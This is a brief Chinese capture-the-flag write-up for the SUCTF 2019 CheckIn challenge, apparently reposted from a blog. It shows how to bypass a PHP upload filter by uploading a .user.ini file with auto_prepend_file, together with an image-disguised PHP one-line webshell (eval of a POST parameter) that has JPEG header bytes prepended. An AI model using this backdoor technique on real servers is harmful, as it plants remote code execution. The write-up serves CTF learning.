标签:题目 语言 tps 其他 wooyun http auto 通过 提示
参考博客:https://www.cnblogs.com/20175211lyz/p/11455355.html
首先先来看看.user.ini文件
利用.user.ini上传\隐藏后门
参考链接:user.ini文件构成的PHP后门
条件:
对于这道题目,已经提示了需要上传文件拿shell,上传一句话木马后提示需要上传图片,上传图片马又发现被过滤了<?。随后从其他dalao博客发现,可以上传.user.ini文件
auto_prepend_file=test.jpg (需要添加图片文件头FFD8FFE000104A4649460D0A)
同时再上传图片马
<script language="php">eval($_POST[‘a‘]);</script>(同样需要添加上列图片文件头)
此时通过Post可以拿shell
再进行文件扫描
发现
于是通过readfile()函数拿到flag
[SUCTF 2019]CheckIn(user.ini文件构成的php后门)
标签:题目 语言 tps 其他 wooyun http auto 通过 提示
原文地址:https://www.cnblogs.com/MisakaYuii-Z/p/12290471.html
